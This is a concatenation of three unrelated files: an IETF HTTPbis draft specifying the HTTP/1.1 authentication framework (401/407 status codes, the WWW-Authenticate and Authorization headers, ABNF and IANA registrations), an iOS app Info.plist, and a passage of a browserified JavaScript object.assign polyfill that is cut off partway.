The following core rules are included by reference, as defined in
[RFC5234], Appendix B.1: ALPHA (letters), CR (carriage return), CRLF
(CR LF), CTL (controls), DIGIT (decimal 0-9), DQUOTE (double quote),
HEXDIG (hexadecimal 0-9/A-F/a-f), LF (line feed), OCTET (any 8-bit
sequence of data), SP (space), VCHAR (any visible USASCII character),
and WSP (whitespace).
1.2.1. Core Rules
The core rules below are defined in Section 1.2.2 of [Part1]:
quoted-string = <quoted-string, defined in [Part1], Section 1.2.2>
token = <token, defined in [Part1], Section 1.2.2>
OWS = <OWS, defined in [Part1], Section 1.2.2>
2. Access Authentication Framework
HTTP provides a simple challenge-response authentication mechanism
that can be used by a server to challenge a client request and by a
client to provide authentication information. It uses an extensible,
case-insensitive token to identify the authentication scheme,
followed by a comma-separated list of attribute-value pairs which
carry the parameters necessary for achieving authentication via that
scheme.
auth-scheme = token
auth-param = token "=" ( token / quoted-string )
The 401 (Unauthorized) response message is used by an origin server
to challenge the authorization of a user agent. This response MUST
include a WWW-Authenticate header field containing at least one
challenge applicable to the requested resource. The 407 (Proxy
Authentication Required) response message is used by a proxy to
challenge the authorization of a client and MUST include a Proxy-
Authenticate header field containing at least one challenge
applicable to the proxy for the requested resource.
challenge = auth-scheme 1*SP 1#auth-param
Note: User agents will need to take special care in parsing the
WWW-Authenticate or Proxy-Authenticate header field value if it
contains more than one challenge, or if more than one WWW-
Authenticate header field is provided, since the contents of a
challenge can itself contain a comma-separated list of
authentication parameters.
Note: Many browsers fail to parse challenges containing unknown
schemes. A workaround for this problem is to list well-supported
schemes (such as "basic") first.
The authentication parameter realm is defined for all authentication
schemes:
realm = "realm" "=" realm-value
realm-value = quoted-string
The realm directive (case-insensitive) is required for all
authentication schemes that issue a challenge. The realm value
(case-sensitive), in combination with the canonical root URI (the
scheme and authority components of the effective request URI; see
Section 4.3 of [Part1]) of the server being accessed, defines the
protection space. These realms allow the protected resources on a
server to be partitioned into a set of protection spaces, each with
its own authentication scheme and/or authorization database. The
realm value is a string, generally assigned by the origin server,
which can have additional semantics specific to the authentication
scheme. Note that there can be multiple challenges with the same
auth-scheme but different realms.
A user agent that wishes to authenticate itself with an origin server
-- usually, but not necessarily, after receiving a 401 (Unauthorized)
-- MAY do so by including an Authorization header field with the
request. A client that wishes to authenticate itself with a proxy --
usually, but not necessarily, after receiving a 407 (Proxy
Authentication Required) -- MAY do so by including a Proxy-
Authorization header field with the request. Both the Authorization
field value and the Proxy-Authorization field value consist of
credentials containing the authentication information of the client
for the realm of the resource being requested. The user agent MUST
choose to use one of the challenges with the strongest auth-scheme it
understands and request credentials from the user based upon that
challenge.
credentials = auth-scheme ( token
/ quoted-string
/ #auth-param )
The protection space determines the domain over which credentials can
be automatically applied. If a prior request has been authorized,
the same credentials MAY be reused for all other requests within that
protection space for a period of time determined by the
authentication scheme, parameters, and/or user preference. Unless
otherwise defined by the authentication scheme, a single protection
space cannot extend outside the scope of its server.
If the origin server does not wish to accept the credentials sent
with a request, it SHOULD return a 401 (Unauthorized) response. The
response MUST include a WWW-Authenticate header field containing at
least one (possibly new) challenge applicable to the requested
resource. If a proxy does not accept the credentials sent with a
request, it SHOULD return a 407 (Proxy Authentication Required). The
response MUST include a Proxy-Authenticate header field containing a
(possibly new) challenge applicable to the proxy for the requested
resource.
The HTTP protocol does not restrict applications to this simple
challenge-response mechanism for access authentication. Additional
mechanisms MAY be used, such as encryption at the transport level or
via message encapsulation, and with additional header fields
specifying authentication information. However, such additional
mechanisms are not defined by this specification.
Proxies MUST forward the WWW-Authenticate and Authorization headers
unmodified and follow the rules found in Section 4.1.
2.1. Authentication Scheme Registry
The HTTP Authentication Scheme Registry defines the name space for
the authentication schemes in challenges and credentials.
Registrations MUST include the following fields:
o Authentication Scheme Name
o Pointer to specification text
Values to be added to this name space are subject to IETF review
([RFC5226], Section 4.1).
The registry itself is maintained at
<http://www.iana.org/assignments/http-authschemes>.
3. Status Code Definitions
3.1. 401 Unauthorized
The request requires user authentication. The response MUST include
a WWW-Authenticate header field (Section 4.4) containing a challenge
applicable to the target resource. The client MAY repeat the request
with a suitable Authorization header field (Section 4.1). If the
request already included Authorization credentials, then the 401
response indicates that authorization has been refused for those
credentials. If the 401 response contains the same challenge as the
prior response, and the user agent has already attempted
authentication at least once, then the user SHOULD be presented the
representation that was given in the response, since that
representation might include relevant diagnostic information.
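
   As an illustrative sketch (the realm, resource, and credentials below
   are invented for the example), a challenge for the "basic" scheme of
   [RFC2617] and the subsequent retry could take the form:

      HTTP/1.1 401 Unauthorized
      WWW-Authenticate: Basic realm="WallyWorld"

      GET /protected/doc HTTP/1.1
      Host: example.org
      Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==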
3.2. 407 Proxy Authentication Required
This code is similar to 401 (Unauthorized), but indicates that the
client ought to first authenticate itself with the proxy. The proxy
MUST return a Proxy-Authenticate header field (Section 4.2)
containing a challenge applicable to the proxy for the target
resource. The client MAY repeat the request with a suitable Proxy-
Authorization header field (Section 4.3).
4. Header Field Definitions
This section defines the syntax and semantics of HTTP/1.1 header
fields related to authentication.
4.1. Authorization
The "Authorization" header field allows a user agent to authenticate
itself with a server -- usually, but not necessarily, after receiving
a 401 (Unauthorized) response. Its value consists of credentials
containing information of the user agent for the realm of the
resource being requested.
Authorization = credentials
If a request is authenticated and a realm specified, the same
credentials SHOULD be valid for all other requests within this realm
(assuming that the authentication scheme itself does not require
otherwise, such as credentials that vary according to a challenge
value or using synchronized clocks).
When a shared cache (see Section 1.2 of [Part6]) receives a request
containing an Authorization field, it MUST NOT return the
corresponding response as a reply to any other request, unless one of
the following specific exceptions holds:
1. If the response includes the "s-maxage" cache-control directive,
the cache MAY use that response in replying to a subsequent
request. But (if the specified maximum age has passed) a proxy
cache MUST first revalidate it with the origin server, using the
header fields from the new request to allow the origin server to
authenticate the new request. (This is the defined behavior for
s-maxage.) If the response includes "s-maxage=0", the proxy MUST
always revalidate it before re-using it.
2. If the response includes the "must-revalidate" cache-control
directive, the cache MAY use that response in replying to a
subsequent request. But if the response is stale, all caches
MUST first revalidate it with the origin server, using the header
fields from the new request to allow the origin server to
authenticate the new request.
3. If the response includes the "public" cache-control directive, it
MAY be returned in reply to any subsequent request.
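The three exceptions above can be sketched as a small decision helper (illustration only: Cache-Control parsing is deliberately simplified, the staleness test is assumed to be computed elsewhere, and a real shared cache has to follow the full caching rules of [Part6]).
    # Hypothetical helper for a shared cache: may a stored response whose
    # request carried an Authorization field be reused for another request?
    def may_reuse_authorized_response(cache_control, is_stale):
        directives = {}
        for part in (cache_control or "").split(","):
            name, _, value = part.strip().lower().partition("=")
            directives[name] = value
        if "public" in directives:
            return True                                  # exception 3
        if "must-revalidate" in directives:
            return not is_stale                          # exception 2: revalidate when stale
        if "s-maxage" in directives:
            return directives["s-maxage"] != "0" and not is_stale   # exception 1 (simplified)
        return False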
4.2. Proxy-Authenticate
The "Proxy-Authenticate" header field consists of a challenge that
indicates the authentication scheme and parameters applicable to the
proxy for this effective request URI (Section 4.3 of [Part1]). It
MUST be included as part of a 407 (Proxy Authentication Required)
response.
Proxy-Authenticate = 1#challenge
Unlike WWW-Authenticate, the Proxy-Authenticate header field applies
only to the current connection and SHOULD NOT be passed on to
downstream clients. However, an intermediate proxy might need to
obtain its own credentials by requesting them from the downstream
client, which in some circumstances will appear as if the proxy is
forwarding the Proxy-Authenticate header field.
4.3. Proxy-Authorization
The "Proxy-Authorization" header field allows the client to identify
itself (or its user) to a proxy which requires authentication. Its
value consists of credentials containing the authentication
information of the user agent for the proxy and/or realm of the
resource being requested.
Proxy-Authorization = credentials
Unlike Authorization, the Proxy-Authorization header field applies
only to the next outbound proxy that demanded authentication using
the Proxy-Authenticate field. When multiple proxies are used in a
chain, the Proxy-Authorization header field is consumed by the first
outbound proxy that was expecting to receive credentials. A proxy
MAY relay the credentials from the client request to the next proxy
if that is the mechanism by which the proxies cooperatively
authenticate a given request.
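A rough sketch of that consumption rule follows (illustration only: header fields are modelled as a plain dictionary, and a real proxy does far more than this).
    # Hypothetical proxy step: the first outbound proxy that demanded
    # authentication consumes Proxy-Authorization; it relays the field
    # only when proxies cooperatively authenticate the request.
    def consume_proxy_credentials(request_headers, expects_credentials, relay=False):
        headers = dict(request_headers)
        credentials = headers.get("Proxy-Authorization")
        if expects_credentials and credentials is not None and not relay:
            del headers["Proxy-Authorization"]   # consumed here, not passed on
        return credentials, headers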
4.4. WWW-Authenticate
The "WWW-Authenticate" header field consists of at least one
challenge that indicates the authentication scheme(s) and parameters
applicable to the effective request URI (Section 4.3 of [Part1]). It
MUST be included in 401 (Unauthorized) response messages.
WWW-Authenticate = 1#challenge
User agents are advised to take special care in parsing the
WWW-Authenticate field value: it might contain more than one
challenge, more than one WWW-Authenticate header field might be
provided, and the contents of a challenge itself can contain a
comma-separated list of authentication parameters.
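The parsing concern above can be illustrated with a deliberately simplified splitter for challenge lists (a sketch only: it assumes auth-params of the form token=token or token=quoted-string, ignores token68-style data, and does not unescape quoted pairs).
    # Hypothetical helper: split a WWW-Authenticate field value into
    # (auth-scheme, params) pairs.  A bare token starts a new challenge;
    # a token followed by "=" is an auth-param of the current challenge.
    import re
    _ITEM = re.compile(r'([!#$%&\'*+\-.^_`|~0-9A-Za-z]+)'
                       r'(?:\s*=\s*("(?:[^"\\]|\\.)*"|[^",\s]+))?')
    def split_challenges(field_value):
        challenges = []
        for name, value in _ITEM.findall(field_value):
            if value and challenges:
                challenges[-1][1][name.lower()] = value.strip('"')
            elif not value:
                challenges.append((name, {}))
        return challenges
    # split_challenges('Newauth realm="apps", type=1, Basic realm="simple"')
    # -> [('Newauth', {'realm': 'apps', 'type': '1'}), ('Basic', {'realm': 'simple'})]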
5. IANA Considerations
5.1. Authentication Scheme Registry
The registration procedure for HTTP Authentication Schemes is defined
by Section 2.1 of this document.
The HTTP Authentication Scheme Registry shall be created at
<http://www.iana.org/assignments/http-authschemes>.
5.2. Status Code Registration
The HTTP Status Code Registry located at
<http://www.iana.org/assignments/http-status-codes> shall be updated
with the registrations below:
+-------+-------------------------------+-------------+
| Value | Description | Reference |
+-------+-------------------------------+-------------+
| 401 | Unauthorized | Section 3.1 |
| 407 | Proxy Authentication Required | Section 3.2 |
+-------+-------------------------------+-------------+
5.3. Header Field Registration
The Message Header Field Registry located at <http://www.iana.org/
assignments/message-headers/message-header-index.html> shall be
updated with the permanent registrations below (see [RFC3864]):
+---------------------+----------+----------+-------------+
| Header Field Name | Protocol | Status | Reference |
+---------------------+----------+----------+-------------+
| Authorization | http | standard | Section 4.1 |
| Proxy-Authenticate | http | standard | Section 4.2 |
| Proxy-Authorization | http | standard | Section 4.3 |
| WWW-Authenticate | http | standard | Section 4.4 |
+---------------------+----------+----------+-------------+
The change controller is: "IETF ([email protected]) - Internet
Engineering Task Force".
6. Security Considerations
This section is meant to inform application developers, information
providers, and users of the security limitations in HTTP/1.1 as
described by this document. The discussion does not include
definitive solutions to the problems revealed, though it does make
some suggestions for reducing security risks.
6.1. Authentication Credentials and Idle Clients
Existing HTTP clients and user agents typically retain authentication
information indefinitely. HTTP/1.1 does not provide a method for a
server to direct clients to discard these cached credentials. This
is a significant defect that requires further extensions to HTTP.
Circumstances under which credential caching can interfere with the
application's security model include but are not limited to:
o Clients which have been idle for an extended period following
which the server might wish to cause the client to reprompt the
user for credentials.
o Applications which include a session termination indication (such
as a "logout" or "commit" button on a page) after which the server
side of the application "knows" that there is no further reason
for the client to retain the credentials.
This is currently under separate study. There are a number of work-
arounds to parts of this problem, and we encourage the use of
password protection in screen savers, idle time-outs, and other
methods which mitigate the security problems inherent in this
problem. In particular, user agents which cache credentials are
encouraged to provide a readily accessible mechanism for discarding
cached credentials under user control.
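One possible shape for such a mechanism is sketched below: a small credential cache that forces a re-prompt after an idle period and can be cleared on demand. The keying by (host, realm) and the particular timeout are assumptions of this example, not requirements of HTTP.
    # Hypothetical user-agent credential cache with an idle timeout and an
    # explicit "discard everything" action under user control.
    import time
    class CredentialCache:
        def __init__(self, idle_timeout=15 * 60):
            self.idle_timeout = idle_timeout
            self._entries = {}                   # (host, realm) -> (credentials, last_used)
        def store(self, host, realm, credentials):
            self._entries[(host, realm)] = (credentials, time.monotonic())
        def lookup(self, host, realm):
            entry = self._entries.get((host, realm))
            if entry is None:
                return None
            credentials, last_used = entry
            if time.monotonic() - last_used > self.idle_timeout:
                del self._entries[(host, realm)]   # idle too long: force a re-prompt
                return None
            self._entries[(host, realm)] = (credentials, time.monotonic())
            return credentials
        def discard_all(self):
            # the "readily accessible mechanism" for discarding cached credentials
            self._entries.clear()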
7. Acknowledgments
This specification takes over the definition of the HTTP
Authentication Framework, previously defined in RFC 2617. We thank
to John Franks, Phillip M. Hallam-Baker, Jeffery L. Hostetler, Scott
D. Lawrence, Paul J. Leach, Ari Luotonen, and Lawrence C. Stewart for
their work on that specification.
[[acks: HTTPbis acknowledgements.]]
8. References
8.1. Normative References
[Part1] Fielding, R., Ed., Gettys, J., Mogul, J., Frystyk, H.,
Masinter, L., Leach, P., Berners-Lee, T., Lafon, Y., Ed.,
and J. Reschke, Ed., "HTTP/1.1, part 1: URIs, Connections,
and Message Parsing", draft-ietf-httpbis-p1-messaging-14
(work in progress), April 2011.
[Part6] Fielding, R., Ed., Gettys, J., Mogul, J., Frystyk, H.,
Masinter, L., Leach, P., Berners-Lee, T., Lafon, Y., Ed.,
Nottingham, M., Ed., and J. Reschke, Ed., "HTTP/1.1, part
6: Caching", draft-ietf-httpbis-p6-cache-14 (work in
progress), April 2011.
[RFC2119] Bradner, S., "Key words for use in RFCs to Indicate
Requirement Levels", BCP 14, RFC 2119, March 1997.
[RFC5234] Crocker, D., Ed. and P. Overell, "Augmented BNF for Syntax
Specifications: ABNF", STD 68, RFC 5234, January 2008.
8.2. Informative References
[RFC2616] Fielding, R., Gettys, J., Mogul, J., Frystyk, H.,
Masinter, L., Leach, P., and T. Berners-Lee, "Hypertext
Transfer Protocol -- HTTP/1.1", RFC 2616, June 1999.
[RFC2617] Franks, J., Hallam-Baker, P., Hostetler, J., Lawrence, S.,
Leach, P., Luotonen, A., and L. Stewart, "HTTP
Authentication: Basic and Digest Access Authentication",
RFC 2617, June 1999.
[RFC3864] Klyne, G., Nottingham, M., and J. Mogul, "Registration
Procedures for Message Header Fields", BCP 90, RFC 3864,
September 2004.
[RFC5226] Narten, T. and H. Alvestrand, "Guidelines for Writing an
IANA Considerations Section in RFCs", BCP 26, RFC 5226,
May 2008.
Appendix A. Changes from RFC 2616
Change ABNF productions for header fields to only define the field
value. (Section 4)
Appendix B. Collected ABNF
Authorization = credentials
OWS = <OWS, defined in [Part1], Section 1.2.2>
Proxy-Authenticate = *( "," OWS ) challenge *( OWS "," [ OWS
challenge ] )
Proxy-Authorization = credentials
WWW-Authenticate = *( "," OWS ) challenge *( OWS "," [ OWS challenge
] )
auth-param = token "=" ( token / quoted-string )
auth-scheme = token
challenge = auth-scheme 1*SP *( "," OWS ) auth-param *( OWS "," [ OWS
auth-param ] )
credentials = auth-scheme ( token / quoted-string / [ ( "," /
auth-param ) *( OWS "," [ OWS auth-param ] ) ] )
quoted-string = <quoted-string, defined in [Part1], Section 1.2.2>
realm = "realm=" realm-value
realm-value = quoted-string
token = <token, defined in [Part1], Section 1.2.2>
ABNF diagnostics:
; Authorization defined but not used
; Proxy-Authenticate defined but not used
; Proxy-Authorization defined but not used
; WWW-Authenticate defined but not used
; realm defined but not used
Appendix C. Change Log (to be removed by RFC Editor before publication)
C.1. Since RFC 2616
Extracted relevant partitions from [RFC2616].
C.2. Since draft-ietf-httpbis-p7-auth-00
Closed issues:
o <http://tools.ietf.org/wg/httpbis/trac/ticket/35>: "Normative and
Informative references"
C.3. Since draft-ietf-httpbis-p7-auth-01
Ongoing work on ABNF conversion
(<http://tools.ietf.org/wg/httpbis/trac/ticket/36>):
o Explicitly import BNF rules for "challenge" and "credentials" from
RFC2617.
o Add explicit references to BNF syntax and rules imported from
other parts of the specification.
C.4. Since draft-ietf-httpbis-p7-auth-02
Ongoing work on IANA Message Header Field Registration
(<http://tools.ietf.org/wg/httpbis/trac/ticket/40>):
o Reference RFC 3984, and update header field registrations for
header fields defined in this document.
C.5. Since draft-ietf-httpbis-p7-auth-03
C.6. Since draft-ietf-httpbis-p7-auth-04
Ongoing work on ABNF conversion
(<http://tools.ietf.org/wg/httpbis/trac/ticket/36>):
o Use "/" instead of "|" for alternatives.
o Introduce new ABNF rules for "bad" whitespace ("BWS"), optional
whitespace ("OWS") and required whitespace ("RWS").
o Rewrite ABNFs to spell out whitespace rules, factor out header
field value format definitions.
C.7. Since draft-ietf-httpbis-p7-auth-05
Final work on ABNF conversion
(<http://tools.ietf.org/wg/httpbis/trac/ticket/36>):
o Add appendix containing collected and expanded ABNF, reorganize
ABNF introduction.
C.8. Since draft-ietf-httpbis-p7-auth-06
None.
C.9. Since draft-ietf-httpbis-p7-auth-07
Closed issues:
o <http://tools.ietf.org/wg/httpbis/trac/ticket/198>: "move IANA
registrations for optional status codes"
C.10. Since draft-ietf-httpbis-p7-auth-08
No significant changes.
C.11. Since draft-ietf-httpbis-p7-auth-09
Partly resolved issues:
o <http://tools.ietf.org/wg/httpbis/trac/ticket/196>: "Term for the
requested resource's URI"
C.12. Since draft-ietf-httpbis-p7-auth-10
None yet.
C.13. Since draft-ietf-httpbis-p7-auth-11
Closed issues:
o <http://tools.ietf.org/wg/httpbis/trac/ticket/130>: "introduction
to part 7 is work-in-progress"
o <http://tools.ietf.org/wg/httpbis/trac/ticket/195>: "auth-param
syntax"
o <http://tools.ietf.org/wg/httpbis/trac/ticket/224>: "Header
Classification"
o <http://tools.ietf.org/wg/httpbis/trac/ticket/237>: "absorbing the
auth framework from 2617"
Partly resolved issues:
o <http://tools.ietf.org/wg/httpbis/trac/ticket/141>: "should we
have an auth scheme registry"
C.14. Since draft-ietf-httpbis-p7-auth-12
None.
C.15. Since draft-ietf-httpbis-p7-auth-13
Closed issues:
o <http://tools.ietf.org/wg/httpbis/trac/ticket/276>: "untangle
ABNFs for header fields"
Index
4
401 Unauthorized (status code) 7
407 Proxy Authentication Required (status code) 7
A
auth-param 5
auth-scheme 5
Authorization header field 8
C
challenge 5
credentials 6
G
Grammar
Authorization 8
Proxy-Authenticate 9
Proxy-Authorization 9
WWW-Authenticate 9
H
Header Fields
Authorization 8
Proxy-Authenticate 9
Proxy-Authorization 9
WWW-Authenticate 9
P
Proxy-Authenticate header field 9
Proxy-Authorization header field 9
R
realm 5
realm-value 5
S
Status Codes
401 Unauthorized 7
407 Proxy Authentication Required 7
W
WWW-Authenticate header field 9
Authors' Addresses
Roy T. Fielding (editor)
Adobe Systems Incorporated
345 Park Ave
San Jose, CA 95110
USA
EMail: [email protected]
URI: http://roy.gbiv.com/
Jim Gettys
Alcatel-Lucent Bell Labs
21 Oak Knoll Road
Carlisle, MA 01741
USA
EMail: [email protected]
URI: http://gettys.wordpress.com/
Jeffrey C. Mogul
Hewlett-Packard Company
HP Labs, Large Scale Systems Group
1501 Page Mill Road, MS 1177
Palo Alto, CA 94304
USA
EMail: [email protected]
Henrik Frystyk Nielsen
Microsoft Corporation
1 Microsoft Way
Redmond, WA 98052
USA
EMail: [email protected]
Larry Masinter
Adobe Systems Incorporated
345 Park Ave
San Jose, CA 95110
USA
EMail: [email protected]
URI: http://larry.masinter.net/
Paul J. Leach
Microsoft Corporation
1 Microsoft Way
Redmond, WA 98052
EMail: [email protected]
Tim Berners-Lee
World Wide Web Consortium
MIT Computer Science and Artificial Intelligence Laboratory
The Stata Center, Building 32
32 Vassar Street
Cambridge, MA 02139
USA
EMail: [email protected]
URI: http://www.w3.org/People/Berners-Lee/
Yves Lafon (editor)
World Wide Web Consortium
W3C / ERCIM
2004, rte des Lucioles
Sophia-Antipolis, AM 06902
France
EMail: [email protected]
URI: http://www.raubacapeu.net/people/yves/
Julian F. Reschke (editor)
greenbytes GmbH
Hafenweg 16
Muenster, NW 48155
Germany
Phone: +49 251 2807760
Fax: +49 251 2807761
EMail: [email protected]
URI: http://greenbytes.de/tech/webdav/
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleDisplayName</key>
<string>AnimateUIView</string>
<key>CFBundleIdentifier</key>
<string>com.your-company.AnimateUIView</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>LSRequiresIPhoneOS</key>
<true />
<key>MinimumOSVersion</key>
<string>9.0</string>
<key>UIDeviceFamily</key>
<array>
<integer>1</integer>
</array>
<key>UILaunchStoryboardName</key>
<string>LaunchScreen</string>
<key>UIRequiredDeviceCapabilities</key>
<array>
<string>armv7</string>
</array>
<key>UISupportedInterfaceOrientations</key>
<array>
<string>UIInterfaceOrientationPortrait</string>
<string>UIInterfaceOrientationLandscapeLeft</string>
<string>UIInterfaceOrientationLandscapeRight</string>
</array>
<key>XSAppIconAssets</key>
<string>Resources/Images.xcassets/AppIcons.appiconset</string>
</dict>
</plist>
| {
"pile_set_name": "Github"
} |
(function e(t,n,r){function s(o,u){if(!n[o]){if(!t[o]){var a=typeof require=="function"&&require;if(!u&&a)return a(o,!0);if(i)return i(o,!0);var f=new Error("Cannot find module '"+o+"'");throw f.code="MODULE_NOT_FOUND",f}var l=n[o]={exports:{}};t[o][0].call(l.exports,function(e){var n=t[o][1][e];return s(n?n:e)},l,l.exports,e,t,n,r)}return n[o].exports}var i=typeof require=="function"&&require;for(var o=0;o<r.length;o++)s(r[o]);return s})({1:[function(require,module,exports){
'use strict';
var keys = require('object-keys').shim();
delete keys.shim;
var assign = require('./');
module.exports = assign.shim();
delete assign.shim;
},{"./":3,"object-keys":9}],2:[function(require,module,exports){
'use strict';
// modified from https://github.com/es-shims/es6-shim
var keys = require('object-keys');
var bind = require('function-bind');
var canBeObject = function (obj) {
return typeof obj !== 'undefined' && obj !== null;
};
var hasSymbols = require('has-symbols/shams')();
var toObject = Object;
var push = bind.call(Function.call, Array.prototype.push);
var propIsEnumerable = bind.call(Function.call, Object.prototype.propertyIsEnumerable);
var originalGetSymbols = hasSymbols ? Object.getOwnPropertySymbols : null;
module.exports = function assign(target, source1) {
if (!canBeObject(target)) { throw new TypeError('target must be an object'); }
var objTarget = toObject(target);
var s, source, i, props, syms, value, key;
for (s = 1; s < arguments.length; ++s) {
source = toObject(arguments[s]);
props = keys(source);
var getSymbols = hasSymbols && (Object.getOwnPropertySymbols || originalGetSymbols);
if (getSymbols) {
syms = getSymbols(source);
for (i = 0; i < syms.length; ++i) {
key = syms[i];
if (propIsEnumerable(source, key)) {
push(props, key);
}
}
}
for (i = 0; i < props.length; ++i) {
key = props[i];
value = source[key];
if (propIsEnumerable(source, key)) {
objTarget[key] = value;
}
}
}
return objTarget;
};
},{"function-bind":7,"has-symbols/shams":8,"object-keys":9}],3:[function(require,module,exports){
'use strict';
var defineProperties = require('define-properties');
var implementation = require('./implementation');
var getPolyfill = require('./polyfill');
var shim = require('./shim');
var polyfill = getPolyfill();
defineProperties(polyfill, {
getPolyfill: getPolyfill,
implementation: implementation,
shim: shim
});
module.exports = polyfill;
},{"./implementation":2,"./polyfill":11,"./shim":12,"define-properties":4}],4:[function(require,module,exports){
'use strict';
var keys = require('object-keys');
var foreach = require('foreach');
var hasSymbols = typeof Symbol === 'function' && typeof Symbol() === 'symbol';
var toStr = Object.prototype.toString;
var isFunction = function (fn) {
return typeof fn === 'function' && toStr.call(fn) === '[object Function]';
};
var arePropertyDescriptorsSupported = function () {
var obj = {};
try {
Object.defineProperty(obj, 'x', { enumerable: false, value: obj });
/* eslint-disable no-unused-vars, no-restricted-syntax */
for (var _ in obj) { return false; }
/* eslint-enable no-unused-vars, no-restricted-syntax */
return obj.x === obj;
} catch (e) { /* this is IE 8. */
return false;
}
};
var supportsDescriptors = Object.defineProperty && arePropertyDescriptorsSupported();
var defineProperty = function (object, name, value, predicate) {
if (name in object && (!isFunction(predicate) || !predicate())) {
return;
}
if (supportsDescriptors) {
Object.defineProperty(object, name, {
configurable: true,
enumerable: false,
value: value,
writable: true
});
} else {
object[name] = value;
}
};
var defineProperties = function (object, map) {
var predicates = arguments.length > 2 ? arguments[2] : {};
var props = keys(map);
if (hasSymbols) {
props = props.concat(Object.getOwnPropertySymbols(map));
}
foreach(props, function (name) {
defineProperty(object, name, map[name], predicates[name]);
});
};
defineProperties.supportsDescriptors = !!supportsDescriptors;
module.exports = defineProperties;
},{"foreach":5,"object-keys":9}],5:[function(require,module,exports){
var hasOwn = Object.prototype.hasOwnProperty;
var toString = Object.prototype.toString;
module.exports = function forEach (obj, fn, ctx) {
if (toString.call(fn) !== '[object Function]') {
throw new TypeError('iterator must be a function');
}
var l = obj.length;
if (l === +l) {
for (var i = 0; i < l; i++) {
fn.call(ctx, obj[i], i, obj);
}
} else {
for (var k in obj) {
if (hasOwn.call(obj, k)) {
fn.call(ctx, obj[k], k, obj);
}
}
}
};
},{}],6:[function(require,module,exports){
'use strict';
/* eslint no-invalid-this: 1 */
var ERROR_MESSAGE = 'Function.prototype.bind called on incompatible ';
var slice = Array.prototype.slice;
var toStr = Object.prototype.toString;
var funcType = '[object Function]';
module.exports = function bind(that) {
var target = this;
if (typeof target !== 'function' || toStr.call(target) !== funcType) {
throw new TypeError(ERROR_MESSAGE + target);
}
var args = slice.call(arguments, 1);
var bound;
var binder = function () {
if (this instanceof bound) {
var result = target.apply(
this,
args.concat(slice.call(arguments))
);
if (Object(result) === result) {
return result;
}
return this;
} else {
return target.apply(
that,
args.concat(slice.call(arguments))
);
}
};
var boundLength = Math.max(0, target.length - args.length);
var boundArgs = [];
for (var i = 0; i < boundLength; i++) {
boundArgs.push('$' + i);
}
bound = Function('binder', 'return function (' + boundArgs.join(',') + '){ return binder.apply(this,arguments); }')(binder);
if (target.prototype) {
var Empty = function Empty() {};
Empty.prototype = target.prototype;
bound.prototype = new Empty();
Empty.prototype = null;
}
return bound;
};
},{}],7:[function(require,module,exports){
'use strict';
var implementation = require('./implementation');
module.exports = Function.prototype.bind || implementation;
},{"./implementation":6}],8:[function(require,module,exports){
'use strict';
/* eslint complexity: [2, 17], max-statements: [2, 33] */
module.exports = function hasSymbols() {
if (typeof Symbol !== 'function' || typeof Object.getOwnPropertySymbols !== 'function') { return false; }
if (typeof Symbol.iterator === 'symbol') { return true; }
var obj = {};
var sym = Symbol('test');
var symObj = Object(sym);
if (typeof sym === 'string') { return false; }
if (Object.prototype.toString.call(sym) !== '[object Symbol]') { return false; }
if (Object.prototype.toString.call(symObj) !== '[object Symbol]') { return false; }
// temp disabled per https://github.com/ljharb/object.assign/issues/17
// if (sym instanceof Symbol) { return false; }
// temp disabled per https://github.com/WebReflection/get-own-property-symbols/issues/4
// if (!(symObj instanceof Symbol)) { return false; }
// if (typeof Symbol.prototype.toString !== 'function') { return false; }
// if (String(sym) !== Symbol.prototype.toString.call(sym)) { return false; }
var symVal = 42;
obj[sym] = symVal;
for (sym in obj) { return false; } // eslint-disable-line no-restricted-syntax
if (typeof Object.keys === 'function' && Object.keys(obj).length !== 0) { return false; }
if (typeof Object.getOwnPropertyNames === 'function' && Object.getOwnPropertyNames(obj).length !== 0) { return false; }
var syms = Object.getOwnPropertySymbols(obj);
if (syms.length !== 1 || syms[0] !== sym) { return false; }
if (!Object.prototype.propertyIsEnumerable.call(obj, sym)) { return false; }
if (typeof Object.getOwnPropertyDescriptor === 'function') {
var descriptor = Object.getOwnPropertyDescriptor(obj, sym);
if (descriptor.value !== symVal || descriptor.enumerable !== true) { return false; }
}
return true;
};
},{}],9:[function(require,module,exports){
'use strict';
// modified from https://github.com/es-shims/es5-shim
var has = Object.prototype.hasOwnProperty;
var toStr = Object.prototype.toString;
var slice = Array.prototype.slice;
var isArgs = require('./isArguments');
var isEnumerable = Object.prototype.propertyIsEnumerable;
var hasDontEnumBug = !isEnumerable.call({ toString: null }, 'toString');
var hasProtoEnumBug = isEnumerable.call(function () {}, 'prototype');
var dontEnums = [
'toString',
'toLocaleString',
'valueOf',
'hasOwnProperty',
'isPrototypeOf',
'propertyIsEnumerable',
'constructor'
];
var equalsConstructorPrototype = function (o) {
var ctor = o.constructor;
return ctor && ctor.prototype === o;
};
var excludedKeys = {
$console: true,
$external: true,
$frame: true,
$frameElement: true,
$frames: true,
$innerHeight: true,
$innerWidth: true,
$outerHeight: true,
$outerWidth: true,
$pageXOffset: true,
$pageYOffset: true,
$parent: true,
$scrollLeft: true,
$scrollTop: true,
$scrollX: true,
$scrollY: true,
$self: true,
$webkitIndexedDB: true,
$webkitStorageInfo: true,
$window: true
};
var hasAutomationEqualityBug = (function () {
/* global window */
if (typeof window === 'undefined') { return false; }
for (var k in window) {
try {
if (!excludedKeys['$' + k] && has.call(window, k) && window[k] !== null && typeof window[k] === 'object') {
try {
equalsConstructorPrototype(window[k]);
} catch (e) {
return true;
}
}
} catch (e) {
return true;
}
}
return false;
}());
var equalsConstructorPrototypeIfNotBuggy = function (o) {
/* global window */
if (typeof window === 'undefined' || !hasAutomationEqualityBug) {
return equalsConstructorPrototype(o);
}
try {
return equalsConstructorPrototype(o);
} catch (e) {
return false;
}
};
var keysShim = function keys(object) {
var isObject = object !== null && typeof object === 'object';
var isFunction = toStr.call(object) === '[object Function]';
var isArguments = isArgs(object);
var isString = isObject && toStr.call(object) === '[object String]';
var theKeys = [];
if (!isObject && !isFunction && !isArguments) {
throw new TypeError('Object.keys called on a non-object');
}
var skipProto = hasProtoEnumBug && isFunction;
if (isString && object.length > 0 && !has.call(object, 0)) {
for (var i = 0; i < object.length; ++i) {
